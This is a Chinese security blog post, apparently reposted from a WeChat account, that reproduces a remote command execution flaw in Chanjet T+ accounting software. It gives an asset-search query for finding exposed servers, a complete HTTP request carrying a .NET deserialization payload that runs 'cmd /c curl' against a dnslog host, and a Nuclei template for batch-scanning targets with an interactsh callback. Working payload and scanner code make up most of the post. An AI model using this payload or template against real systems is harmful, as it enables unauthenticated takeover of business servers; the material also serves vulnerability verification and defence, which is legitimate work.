畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

admin

102737
文章

87
评论

2024年4月8日11:00:05评论21 views字数 2069阅读6分53秒阅读模式

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

漏洞简介

/tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx接口存在.net反序列化漏洞，未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令。

漏洞复现

步骤一：使用以下搜索语法获取测试资产并确定测试目标~~~

# 搜索语法app="畅捷通-TPlus"

步骤二：使用以下数据包进行命令执行测试并查看其DNSLog记录可得存在命令执行漏洞...

POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/jsonContent-Length: 614{  "storeID":{    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",    "MethodName":"Start",    "ObjectInstance":{        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",        "StartInfo": {            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",            "FileName":"cmd", "Arguments":"/c curl 9o4ip1.dnslog.cn"       }    }  }}

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

步骤三：执行命令并记录到对应的文件中...在从浏览器中进行访问获取命令执行结果...。

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

批量脚本

id: cjt-rceinfo:  name: cjt-rce  author: ly  severity: highhttp:  - raw:      - |        POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36        Connection: close        Content-Type: application/json        {          "storeID": {            "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",            "MethodName": "Start",            "ObjectInstance": {              "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",              "StartInfo": {                "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",                "FileName": "cmd",                "Arguments": "/c ping {{interactsh-url}}"              }            }          }        }    matchers:      - type: word        part: interactsh_protocol        words:          - "dns"

原文始发于微信公众号（揽月安全团队）：畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

漏洞预警 | 若依druid未授权访问漏洞

发表评论

在线咨询

微信